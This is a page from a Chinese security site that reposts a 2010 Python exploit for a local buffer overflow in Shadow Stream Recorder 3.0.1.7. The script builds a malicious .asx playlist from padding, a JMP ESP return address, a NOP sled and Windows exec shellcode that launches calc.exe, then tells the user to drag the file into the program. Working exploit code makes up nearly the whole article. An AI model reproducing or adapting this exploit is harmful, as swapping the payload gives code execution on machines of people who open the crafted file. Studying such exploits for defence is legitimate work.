首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
来源:vfocus.net 作者:b0telh0 发布时间:2010-03-31  

#!/usr/bin/python
#
# Title: Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
# Date: 03-29-2010
# Author: b0telh0
# Link: http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
# Tested on: Windows XP SP3


#
# windows/exec - 228 bytes
# EXITFUNC=seh, CMD=calc.exe
#

shellcode = ("\xda\xd6\xbe\xc4\x14\x6b\x17\x31\xc9\xd9\x74\x24\xf4\x58\xb1"
 "\x33\x83\xe8\xfc\x31\x70\x14\x03\x70\xd0\xf6\x9e\xeb\x30\x7f"
 "\x60\x14\xc0\xe0\xe8\xf1\xf1\x32\x8e\x72\xa3\x82\xc4\xd7\x4f"
 "\x68\x88\xc3\xc4\x1c\x05\xe3\x6d\xaa\x73\xca\x6e\x1a\xbc\x80"
 "\xac\x3c\x40\xdb\xe0\x9e\x79\x14\xf5\xdf\xbe\x49\xf5\xb2\x17"
 "\x05\xa7\x22\x13\x5b\x7b\x42\xf3\xd7\xc3\x3c\x76\x27\xb7\xf6"
 "\x79\x78\x67\x8c\x32\x60\x0c\xca\xe2\x91\xc1\x08\xde\xd8\x6e"
 "\xfa\x94\xda\xa6\x32\x54\xed\x86\x99\x6b\xc1\x0b\xe3\xac\xe6"
 "\xf3\x96\xc6\x14\x8e\xa0\x1c\x66\x54\x24\x81\xc0\x1f\x9e\x61"
 "\xf0\xcc\x79\xe1\xfe\xb9\x0e\xad\xe2\x3c\xc2\xc5\x1f\xb5\xe5"
 "\x09\x96\x8d\xc1\x8d\xf2\x56\x6b\x97\x5e\x39\x94\xc7\x07\xe6"
 "\x30\x83\xaa\xf3\x43\xce\xa0\x02\xc1\x74\x8d\x04\xd9\x76\xbe"
 "\x6c\xe8\xfd\x51\xeb\xf5\xd7\x15\x0d\x07\xea\x83\x99\xbe\x9f"
 "\xe9\xc4\x40\x4a\x2d\xf0\xc2\x7f\xce\x07\xda\xf5\xcb\x4c\x5c"
 "\xe5\xa1\xdd\x09\x09\x15\xde\x1b\x6a\xf8\x4c\xc7\x43\x9f\xf4"
 "\x62\x9c\x55");

junk = "\x41" * 26112
eip = "\x53\x93\x37\x7E"        # 7E379353  USER32.dll  (JMP ESP)
nops = "\x90" * 20
junk2 = "\x41" * 3636

try:
    file = open('b0t.asx','w');
    file.write(junk+eip+nops+shellcode+junk2);
    file.close();
    print "\n[+] b0t.asx created."
    print "[+] Open ssrecorder.exe..."
    print "[+] and drag and drop b0t.asx.\n"
except:
    print "\n[-] Error.. Can't write file to system.\n"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·All to All Audio Convertor v2.
·ASX to MP3 Converter Version 3
·RM Downloader 3.0.2.1 (.asx) L
·Xilisoft Blackberry Ring Tone
·Peazip 3.0 DOS attack
·Easy Icon Maker .ico File Read
·Proxomitron 4.5 DOS attack
·CompleteFTP Server Directory T
·Jira Atlassian File Attachment
·HP OpenView NNM OvWebHelp.exe
·Firefox 3.5 Stack Overflow Exp
·Free MP3 CD Ripper 2.6 0-day
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved